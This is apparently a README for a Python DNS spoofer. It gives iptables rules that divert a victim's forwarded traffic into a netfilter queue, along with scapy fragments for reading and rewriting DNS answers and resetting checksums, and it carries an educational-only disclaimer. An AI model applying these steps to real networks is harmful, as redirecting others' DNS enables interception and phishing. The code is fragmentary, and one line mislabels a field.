# Py DNS Spoofer
### disclaimer : This code should not be used on anyone, this is strictly for educational purposes only.

## Require

### scapy

* debian install :
```bash
apt-get install scapy
```

* pip install :
```bash
pip install scapy-python3
```


## 1- Iptables rules

* if want to test / attack remote computer); Trap all packets that usually go to Forward chain & put this (-j) to nfqueue :

`iptables -I FORWARD -j NFQUEUE --queue-num 0`

* if want to test / attack your computer; Trap all packets :

`iptables -I OUTPUT -j NFQUEUE --queue-num 0`

`iptables -I INPUT -j NFQUEUE --queue-num 0`

## 2- Modify Queue

#### require netfilterqueue :
`apt-get install build-essential python-dev libnetfilter-queue-dev`

`pip install netfilterqueue`

#### Use :

```python
def process_packet(packet):
    print(packet)
    # Accept Forwarding packet to it's destination
    packet.accept()
    # Or Drop the packet
    packet.drop()
```

## 3- Modify DNS Response

### To see different layer:

print(scapy_packet.show())

#### Usage :
```python
    # Access to layer DNSQR and field qname
    qname = scapy_packet[scapy.DNSQR].qname
        
    # Access to layer DNSRR and field rdata
    qname = scapy_packet[scapy.DNSRR].rdata
        
    # Delete chksum field from IP stack (then auto calculate by scapy)
    del scapy_packet[scapy.IP].chksum
        
    # Delete len field from UDP stack (then auto calculate by scapy)
    del scapy_packet[scapy.UDP].len
```

Scapy automatically recalculate checksum from deleted fields
